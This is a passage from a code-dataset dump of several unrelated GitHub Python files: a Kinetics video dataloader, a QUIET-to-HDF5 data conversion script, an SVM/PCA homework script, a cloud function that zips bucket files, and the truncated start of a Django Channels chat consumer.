frame_sample_rate=2,\n keep_aspect_ratio=False, num_segment=1, use_augment=False):\n super(KineticsDataset,self).__init__()\n self.data_root = data_root\n self.image_size = image_size\n self.pre_seq_length = pre_seq_length\n self.aft_seq_length = aft_seq_length\n self.seq_length = pre_seq_length + aft_seq_length\n self.use_augment = use_augment\n self.input_shape = (self.seq_length, self.image_size, self.image_size, 3)\n\n self.frame_sample_rate = frame_sample_rate\n self.keep_aspect_ratio = keep_aspect_ratio\n self.num_segment = num_segment\n assert list_path.endswith('csv')\n\n import pandas as pd\n file_list = pd.read_csv(list_path, header=None, delimiter=',')\n dataset_samples = list(file_list.values[1:, 1])\n self.label_array = list(file_list.values[1:, 0])\n self.mode = list(file_list.values[1:, 4])[0]\n time_start, time_end = list(file_list.values[1:, 2]), list(file_list.values[1:, 3])\n self.file_list = list()\n for i,name in enumerate(dataset_samples):\n self.file_list.append(os.path.join(data_root, self.mode, \"{}_{}_{}.mp4\".format(\n name, int_to_str(time_start[i]), int_to_str(time_end[i]))))\n\n self.data_transform = Compose([\n Resize(image_size, interpolation='bilinear'),\n CenterCrop(size=(image_size, image_size)),\n ClipToTensor(),\n Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n self.mean = None\n self.std = None\n\n def loadvideo_decord(self, sample, sample_rate_scale=1):\n \"\"\"Load video content using Decord\"\"\"\n fname = sample\n\n if not (os.path.exists(fname)):\n return []\n\n # avoid hanging issue\n if os.path.getsize(fname) < 1 * 1024:\n print('SKIP: ', fname, \" - \", os.path.getsize(fname))\n return []\n try:\n if self.keep_aspect_ratio:\n vr = VideoReader(fname, num_threads=1, ctx=cpu(0))\n else:\n vr = VideoReader(fname, width=self.image_size, height=self.image_size,\n num_threads=1, ctx=cpu(0))\n except:\n print(\"video cannot be loaded by decord: \", fname)\n return []\n\n if self.mode == 'test':\n all_index = [x for x in range(0, len(vr), self.frame_sample_rate)]\n while len(all_index) < self.seq_length:\n all_index.append(all_index[-1])\n vr.seek(0)\n buffer = vr.get_batch(all_index).asnumpy()\n return buffer\n\n # handle temporal segments\n converted_len = int(self.seq_length * self.frame_sample_rate)\n seg_len = len(vr) // self.num_segment\n\n 
all_index = []\n for i in range(self.num_segment):\n if seg_len <= converted_len:\n index = np.linspace(0, seg_len, num=seg_len // self.frame_sample_rate)\n index = np.concatenate((index, np.ones(\n self.seq_length - seg_len // self.frame_sample_rate) * seg_len))\n index = np.clip(index, 0, seg_len - 1).astype(np.int64)\n else:\n end_idx = np.random.randint(converted_len, seg_len)\n str_idx = end_idx - converted_len\n index = np.linspace(str_idx, end_idx, num=self.seq_length)\n index = np.clip(index, str_idx, end_idx - 1).astype(np.int64)\n index = index + i*seg_len\n all_index.extend(list(index))\n\n all_index = all_index[::int(sample_rate_scale)]\n vr.seek(0)\n buffer = vr.get_batch(all_index).asnumpy()\n return buffer\n\n def _augment_seq(self, buffer):\n \"\"\"Augmentations for video\"\"\"\n raise NotImplementedError\n\n def __len__(self):\n return len(self.file_list)\n\n def __getitem__(self, idx):\n sample = self.file_list[idx]\n buffer = self.loadvideo_decord(sample)\n if len(buffer) == 0:\n while len(buffer) == 0:\n warnings.warn(\"video {} not correctly loaded during {}ing\".format(sample, self.mode))\n index = np.random.randint(self.__len__())\n sample = self.file_list[index]\n buffer = self.loadvideo_decord(sample)\n\n # augmentation\n if self.use_augment:\n buffer = self._augment_seq(buffer)\n\n # transform\n buffer = self.data_transform(buffer).permute(1, 0, 2, 3) # (C, T, H, W) -> (T, C, H, W)\n data = buffer[0:self.pre_seq_length, ...]\n labels = buffer[self.aft_seq_length:self.seq_length, ...]\n # print(sample, buffer.shape, data.shape, labels.shape)\n\n return data, labels\n\n\ndef load_data(batch_size, val_batch_size, data_root, num_workers=4, data_name='kinetics400',\n pre_seq_length=4, aft_seq_length=4, in_shape=[4, 3, 256, 256],\n distributed=False, use_augment=False, use_prefetcher=False, drop_last=False):\n\n assert data_name in ['kinetics400', 'kinetics600', 'kinetics700']\n data_root = os.path.join(data_root, data_name)\n image_size = in_shape[-1] if in_shape is not None else 256\n train_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/train.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=use_augment)\n val_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/val.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=False)\n test_set = KineticsDataset(data_root, os.path.join(data_root, 'annotations/test.csv'), image_size,\n pre_seq_length=pre_seq_length, aft_seq_length=aft_seq_length,\n frame_sample_rate=2, keep_aspect_ratio=True, use_augment=False)\n dataloader_train = create_loader(train_set,\n batch_size=batch_size,\n shuffle=True, is_training=True,\n pin_memory=True, drop_last=True,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n dataloader_test = create_loader(test_set,\n batch_size=val_batch_size,\n shuffle=False, is_training=False,\n pin_memory=True, drop_last=drop_last,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n dataloader_val = create_loader(val_set,\n batch_size=val_batch_size,\n shuffle=False, is_training=False,\n pin_memory=True, drop_last=drop_last,\n num_workers=num_workers,\n distributed=distributed, use_prefetcher=use_prefetcher)\n\n return dataloader_train, dataloader_val, dataloader_test\n\n\nif __name__ == '__main__':\n from openstl.utils import 
init_dist\n os.environ['LOCAL_RANK'] = str(0)\n os.environ['RANK'] = str(0)\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12357'\n dist_params = dict(launcher='pytorch', backend='nccl', init_method='env://', world_size=1)\n init_dist(**dist_params)\n\n dataloader_train, _, dataloader_test = \\\n load_data(batch_size=16,\n val_batch_size=4,\n data_root='../../data/',\n num_workers=4,\n pre_seq_length=4, aft_seq_length=4,\n use_prefetcher=True, distributed=True)\n\n print(len(dataloader_train), len(dataloader_test))\n for item in dataloader_train:\n print(item[0].shape, item[1].shape)\n break\n for item in dataloader_test:\n print(item[0].shape, item[1].shape)\n break\n", "repo_name": "chengtan9907/OpenSTL", "sub_path": "openstl/datasets/dataloader_kinetics.py", "file_name": "dataloader_kinetics.py", "file_ext": "py", "file_size_in_byte": 9510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 403, "dataset": "github-code", "pt": "61", "api": [{"api_name": "decord.VideoReader", "line_number": 13, "usage_type": "name"}, {"api_name": "decord.cpu", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 23, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "openstl.datasets.pipelines.transforms.Compose", "line_number": 65, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.Resize", "line_number": 66, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.CenterCrop", "line_number": 67, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.ClipToTensor", "line_number": 68, "usage_type": "call"}, {"api_name": "openstl.datasets.pipelines.transforms.Normalize", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "decord.VideoReader", "line_number": 88, "usage_type": "call"}, {"api_name": "decord.cpu", "line_number": 88, "usage_type": "call"}, {"api_name": "decord.VideoReader", "line_number": 90, "usage_type": "call"}, {"api_name": "decord.cpu", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 119, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 140, "usage_type": "call"}, {"api_name": 
"numpy.random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 174, "usage_type": "call"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 180, "usage_type": "call"}, {"api_name": "openstl.datasets.utils.create_loader", "line_number": 186, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 201, "usage_type": "attribute"}, {"api_name": "openstl.utils.init_dist", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "18743822059", "text": "#---------------------------------------------\nimport os\nimport numpy as np\nimport healpy as hp \nimport h5py\nimport math\nimport time\nimport argparse\nimport re\nfrom tqdm import tqdm\nimport multiprocessing as mp\nfrom joblib import cpu_count, Parallel, delayed, parallel_backend\nfrom pathlib import Path\n# Getting full path to Mathew's library as an object\ncommander_tools_path = Path(__file__).absolute().parents[2].joinpath('python','commander_tools').resolve()\n# Appending the path to `PYTHONPATH`, so no need to \n# modify it externally (in your `.bashrc` etc.)\nimport sys\nsys.path.append(str(commander_tools_path))\n# Importing necessary modules from Mathew's library \nfrom tod_tools import commander_tod as comm_tod\n#from tod_tools import huffman\n#---------------------------------------------\n\"\"\"\nThis script creates Commander3 suitable input \ndata files from QUIET Level3 data. 
\n\"\"\"\n#---------------------------------------------\n\ndef main():\n \"\"\"\n Main method of the script\n \"\"\"\n #nprocs = mp.cpu_count()\n #nprocs = joblib.cpu_count()\n nprocs = cpu_count()\n level3_dir = Path('/mn/stornext/d16/cmbco/bp/maksym/quiet/data/Q/ces/patch_gc') \n output_dir = Path('/mn/stornext/d16/cmbco/bp/maksym/quiet/data/Q/ces/patch_gc/output')\n if not Path.is_dir(output_dir):\n Path.mkdir(output_dir)\n version = np.string_('0.0.2')\n freqs = ['Q']\n #---------------------------------------------\n # Retrieving data\n #---------------------------------------------\n # Getting file names inside specified directory and removing the path component\n level3_data_files = sorted(level3_dir.rglob('*.hdf')) \n level3_data_files = [data_file.name for data_file in level3_data_files]\n # Retrieving CES values from the file names \n compiled_pattern = re.compile('[\\d]')\n level3_ces_nums = [int(\"\".join(compiled_pattern.findall(data_file))) \n for data_file in level3_data_files] \n #---------------------------------------------\n with parallel_backend(backend=\"multiprocessing\", n_jobs=nprocs):\n manager = mp.Manager()\n # Initialising tod object\n dicts = {freqs[0]:manager.dict()}#, 44:manager.dict(), 70:manager.dict()}\n ctod = comm_tod.commander_tod(output_dir, 'QUIET', version, dicts=dicts, overwrite=True)\n #\n x = Parallel(verbose=2)(delayed(make_od)\n (level3_dir, level3_data_files, level3_ces_nums, ctod, \n version, freqs, dicts, k) for k in range(len(level3_ces_nums)))\n #make_od(level3_dir, output_dir, version, freqs, dicts)\n # making filelist\n ctod.make_filelists()\n\n\ndef make_od(level3_dir, level3_data_files, \n level3_ces_nums, ctod, version, freqs, dicts, k):\n \"\"\"\n Method to process one file/CES\n \"\"\"\n # Working with all the files for a given patch\n #for i in tqdm(range(3)):#len(level3_ces_nums)):\n # Retrieving data from old Level3 files \n readin_file = h5py.File(level3_dir / level3_data_files[k], 'r')\n print(f\"Working with file: {level3_data_files[k]}\")\n # Things to include per detector\n alpha = np.array(readin_file.get('alpha'))\n fknee = np.array(readin_file.get('fknee'))\n gain = np.array(readin_file.get('gain'))\n sigma0 = np.array(readin_file.get('sigma0'))\n tods = np.array(readin_file.get('tod'))\n tp = np.array(readin_file.get('tp'))\n # Things to include into common group \n coord_sys = np.array(readin_file.get('coord_sys'))\n nside = np.array(readin_file.get('nside'))\n samprate = np.array(readin_file.get('samprate'))\n scanfreq = np.array(readin_file.get('scanfreq'))\n time_vals = np.array(readin_file.get('time'))\n time_gain = np.array(readin_file.get('time_gain'))\n # Retrieving pointings which will be compressed\n pointing = np.array(readin_file.get('point'))\n point_objrel = np.array(readin_file.get('point_objrel'))\n # Converting pointings to pixels\n phi = pointing[:,:,0]\n theta = pointing[:,:,1]\n psi = pointing[:,:,2]\n pixels = hp.ang2pix(nside, theta, phi)\n #---------------------------------------------\n # Writing data to a file\n #---------------------------------------------\n # Huffmann compression\n huffman = ['huffman', {'dictNum':1}]\n # Digitization values for \\psi \n npsi = 4096\n psiBins = np.linspace(0, 2*np.pi, npsi)\n datatype = 'QUIET'\n det_list = []\n # Creating new file\n ces = level3_ces_nums[k]\n ctod.init_file(freqs[0], ces, mode='w')\n #---------------------------------------------\n # Looping through 19 amplifiers (1 ampl has 4 diodes)\n # and adding new fields to a file\n i = 0\n #for det in 
tqdm(range(0, 19, 1)):\n    for det in range(0, 19, 1):\n        label = str(det+1).zfill(2) #+ f'{diode_labels[diode]}'\n        prefix = f'{ces}'.zfill(6) + '/' + label \n        # Digitizing \\psi\n        if(len(psi[det]) > 0):\n            psiArray = np.where(psi[det] < 0, 2*np.pi + psi[det], psi[det])\n            psiArray = np.where(psiArray >= 2*np.pi, psiArray - 2*np.pi, psiArray)\n            psiIndices = np.digitize(psiArray, psiBins)\n        # This field is concatenation of 4 tods (i.e. 4 diodes to form amplifier)\n        diodes_tods = []\n        diodes_scalars = []\n        diodes_names = []\n        for diode in range(0, 4, 1):\n            diodes_tods.append(tods[i])\n            diodes_scalars.append(np.array([gain[i][0], sigma0[i], fknee[i], alpha[i]]))\n            diodes_names.append(f'ref{diode}')\n            i = i + 1\n        diodes_tods = np.array(diodes_tods)\n        diodes_scalars = np.array(diodes_scalars)\n        diodes_flags = np.zeros_like(diodes_tods)\n        #---------------------------------------------\n        # Adding fields\n        ctod.add_field(prefix + '/psi', psiIndices, huffman)#, [psiDigitize, huffman])\n        ctod.add_field(prefix + '/pix', pixels[det], huffman)\n        # TODs should be 4xN_tod per amplifier\n        ctod.add_field(prefix + '/diodes', diodes_tods)\n        # Scalars should be 4x4 per amplifier\n        ctod.add_field(prefix + '/dscalars', diodes_scalars)\n        # Flags for accepted/rejected vals in Commander3\n        ctod.add_matrix(prefix + '/dflag', diodes_flags, diodes_names, huffman)\n        #\n        det_list.append(label)\n    #---------------------------------------------\n    # Things common for each ces scan\n    prefix = 'common'\n    ctod.add_field(prefix + '/det', np.string_(det_list))\n    ctod.add_field(prefix + '/datatype', np.string_(datatype))\n    ctod.add_field(prefix + '/npsi', npsi)\n    ctod.add_field(prefix + '/nside', nside)\n    polang = np.array([0, 0, 0, 0])\n    nbang = np.array([0, 0, 0, 0])\n    ctod.add_field(prefix + '/polang', polang)\n    ctod.add_field(prefix + '/nbang', nbang)\n    ctod.add_field(prefix + '/fsamp', samprate)\n    #---------------------------------------------\n    '''\n    Things common for each detector\n\n    [x] vsun <= velocity of the Earth wrt Sun in Galactic Coordinates, x,y,z, put np.array([0,0,0]) for now\n    [x] time <= take np.array([time[0], 0, 0]) \n    [x] huffsym <= for flags, pix and the psi generated huffman symbols (for decoding)\n    [x] hufftree <= for flags, pix and psi generated huffman tree (encoded values)\n    '''\n    prefix = f'{ces}'.zfill(6) + '/common'\n    vsun = np.array([0, 0, 0])\n    ctod.add_field(prefix + '/vsun', vsun)\n    ctod.add_field(prefix + '/time', np.array([time_vals[0], 0, 0]))\n    #---------------------------------------------\n    print(f\"Running finalize_chunk on file: {level3_data_files[k]}\")\n    ctod.finalize_chunk(f'{ces}'.zfill(6))\n    print(\"finalize_chunk has finished\")\n    ctod.finalize_file()\n\n\n\nif __name__ == '__main__':\n    start_time = time.time()\n    print(\"Script has started!\")\n    main()\n    end_time = time.time()\n    total_time = end_time - start_time\n    print(f\"Script run time: {total_time:.2f} s\")\n\n", "repo_name": "Cosmoglobe/Commander", "sub_path": "commander3/todscripts/quiet/quiettohdf5.py", "file_name": "quiettohdf5.py", "file_ext": "py", "file_size_in_byte": 8001, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "joblib.cpu_count", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 
37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path.is_dir", "line_number": 39, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "name"}, {"api_name": "pathlib.Path.mkdir", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.string_", "line_number": 41, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 54, "usage_type": "call"}, {"api_name": "multiprocessing.Manager", "line_number": 55, "usage_type": "call"}, {"api_name": "tod_tools.commander_tod.commander_tod", "line_number": 58, "usage_type": "call"}, {"api_name": "tod_tools.commander_tod", "line_number": 58, "usage_type": "name"}, {"api_name": "joblib.Parallel", "line_number": 60, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 60, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "healpy.ang2pix", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.digitize", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.string_", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.string_", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "41179194157", "text": 
"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport re\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score, classification_report\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\n\n# Read in data\nlines_data = []\nwith open('histograms.txt', 'rt') as in_file:\n    for line in in_file:\n        lines_data.append(line.rstrip('\\n'))\n\n# parse output +-1:[data] into x = [1,1,-1,...] y = [data]\ndata_list = []\nfor line in lines_data:\n    label = int(re.split(':', line)[0])\n\n    parsed_input = re.split('1:', line)[1].strip()\n    parsed_input = parsed_input.replace(\"[\", \"\").replace(\"]\", \"\")\n    parsed_input_list = parsed_input.split(',')\n    inputs = [float(el) for el in parsed_input_list]\n    row = [label] + inputs\n    data_list.append(row)\ndata = np.asarray(data_list)\n\nx = data[:, 1:]\ny = data[:, 0] #labels\ny = y.reshape(5699, )\n\nsample_x = data[:, 1:]\nsample_y = y[:]\n\n# Build the SVM\nclf = svm.SVC(kernel='linear')\nclf.fit(x, y)\ny_pred = clf.predict(sample_x)\n\ncount = 0\nfor label, predicted in zip(sample_y, y_pred):\n    if (label == predicted):\n        continue\n    print(\"%r\" % (label == predicted))\n    count += 1\nprint(count)\n\nscores = zip(sample_y, y_pred)\nmapped_scores = list(scores)\n\n# Model Evaluation\nprint(\"---- SVM MODEL REPORT -----\")\nprint(\"Accuracy: %f\" % accuracy_score(sample_y, y_pred))\nprint(classification_report(sample_y, y_pred))\n# Writing data to file\ninputFile = open(\"SVM_info.txt\", \"w\")\ninputFile.write(\"---- SVM MODEL REPORT ----- \\n\")\ninputFile.write(\"Accuracy: %f \\n\" % accuracy_score(sample_y, y_pred))\ninputFile.write(classification_report(sample_y, y_pred))\ninputFile.close()\n\n# PCA - part II\npca_model = PCA(n_components=100)\nvariance = pca_model.fit(data)\nprint(\"--- PCA ---\")\nprint(variance)\nprint(\"Eigenvalues: \\n\")\nprint(pca_model.explained_variance_)\nprint(\"Explained variance ratio\")\nprint(pca_model.explained_variance_ratio_)\nprint(\"Explained variance cum. 
sum\")\nprint(pca_model.explained_variance_ratio_.cumsum())\nprint(\"Principal components: \\n\")\nprint(pca_model.components_)\n\npca_data = pca_model.transform(data)\nprint(pca_data)\n\n# Writing data to file\ninputFile = open(\"PCA_info.txt\", \"w\")\ninputFile.write(str(pca_model.explained_variance_))\ninputFile.close()", "repo_name": "NguyenDa18/MachineLearning_HW4", "sub_path": "hw4.py", "file_name": "hw4.py", "file_ext": "py", "file_size_in_byte": 2289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.split", "line_number": 19, "usage_type": "call"}, {"api_name": "re.split", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 37, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "72729584834", "text": "# ===========================================================================================\n# Objeto........: fnc_zip_files\n# Data Criacao..: 09/01/2023\n# Descricao.....: Zipa arquivos e efetua upload para o bucket\n# ===========================================================================================\nimport io \nimport datetime, time\nfrom zipfile import ZipFile, ZIP_DEFLATED\nimport sys\nfrom cloud_function.fnc_zip_file.utils import Blob\nimport logging\n\nimport functions_framework\n\nstart_time = time.time()\n\n@functions_framework.http\ndef main(request):\n print('main')\n print(f'{datetime.datetime.now()}')\n\n # Variaveis de Entrada\n GCS_INPUT = request.json[\"gcs_input\"]\n GCS_OUTPUT = request.json[\"gcs_output\"]\n FILENAME = request.json[\"filename\"]\n\n # Variaveis de Input\n INPUT_BUCKET_NAME = GCS_INPUT.split(\"/\")[2]\n PREFIX = GCS_INPUT.split('/',3)[3].replace('*','')\n\n # Variaveis de Output\n OUTPUT_BUCKET_NAME = GCS_OUTPUT.split(\"/\")[2]\n FILE_PATH = GCS_OUTPUT.split('/',3)[3] if GCS_OUTPUT.endswith(\"/\") else GCS_OUTPUT.split('/',3)[3] + '/'\n\n print(\"Connecting to input bucket\")\n input_bucket: Blob = Blob(INPUT_BUCKET_NAME) # Conecta bucket origem\n blob_files: list = input_bucket.lista_blobs(PREFIX) # Lista arquivos bucket\n \n # Verificando se existem arquivos no bucket passado\n if blob_files:\n \n output_bucket: Blob = Blob(OUTPUT_BUCKET_NAME,f\"{FILE_PATH}{FILENAME}.zip\") # Conecta ao blob destino\n\n archive = io.BytesIO() # Inicializando arquivo em memoria\n \n # Inicializando escrita zip \n with ZipFile(archive,\"w\",compression=ZIP_DEFLATED) as zip_file:\n \n # Abrindo arquivo dentro do zip\n with zip_file.open(f\"{FILENAME}.csv\",\"w\", force_zip64=True) as zip_archive:\n for blob_path in blob_files:\n\n blob_name= blob_path.split('/')[-1]\n blob_size = input_bucket.get_size(blob_path)\n print(f\"[INFO] - Download file {blob_name}\")\n\n # Identifica quantas vezes o arquivo deve ser divido\n split_size = 120 # Tamanho em MB\n split_number = int((blob_size/1024**2)/split_size) if (blob_size/1024**2) > split_size else 1 \n split_list = 
Blob.split_byte_size(size=blob_size,blob_path=blob_path,split_number=split_number)\n\n for idx, chunk_blob in enumerate(split_list):\n chunk_downloaded = input_bucket.download_by_parts(input=chunk_blob)\n print(f\"[INFO] - Download file {blob_name} parte {idx+1} de {len(split_list)}\")\n\n zip_archive.write(chunk_downloaded) # Escreve no arquivo em memoria\n\n print(f\"[INFO] - Download file {blob_name} {idx+1} of {len(split_list)}\")\n time.sleep(0.05)\n\n archive.seek(0) # Acum\n output_bucket.upload_bytes_to_bucket(file_buffer=archive,content_type=\"application/zip\")\n archive.close() # Apagando arquivo em memoria\n else:\n print('[INFO] - Arquivo(s) não encontrado(s)')\n \n print(\"[INFO] - Cloud Run concluida em {:.2f} segundos\".format(round(time.time() - start_time,2)))\n return \"[INFO] - Cloud Function concluida\"", "repo_name": "codicarlys/GoogleCloudPlatform", "sub_path": "cloud_function/fnc_zip_file/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 36, "usage_type": "name"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 42, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 44, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 47, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 47, "usage_type": "name"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob.split_byte_size", "line_number": 60, "usage_type": "call"}, {"api_name": "cloud_function.fnc_zip_file.utils.Blob", "line_number": 60, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}, {"api_name": "functions_framework.http", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "4410509455", "text": "import json\n\nfrom channels.generic.websocket import WebsocketConsumer\nfrom asgiref.sync import async_to_sync\n\nfrom .models import PrivateBlock\n\n\nclass PrivateBlockConsumer(WebsocketConsumer):\n def connect(self):\n present_user = self.scope['user'].id if self.scope['user'].id else int(self.scope['query_string'])\n other_user = self.scope['url_route']['kwargs']['userId']\n self.private_block_name = (\n f'{present_user}_{other_user}'\n if int(present_user) > int(other_user)\n else f'{other_user}_{present_user}'\n )\n self.private_block_chat_name = f'block_{self.private_block_name}'\n self.user = self.scope['user']\n\n self.accept()\n\n async_to_sync(self.channel_layer.group_add)(\n self.private_block_chat_name,\n self.channel_name\n )\n\n def disconnect(self, code):\n async_to_sync(self.channel_layer.group_discard)(\n self.private_block_chat_name,\n self.channel_name\n )\n\n def receive(self, text_data=None, bytes_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n\n if not self.user.is_authenticated:\n return\n\n async_to_sync(self.channel_layer.group_send)(\n self.private_block_chat_name,\n {\n 'type': 'private_block_message',\n 'user_id': self.user.id,\n 'user': self.user.username,\n 'message': message\n }\n )\n PrivateBlock.objects.create(\n 
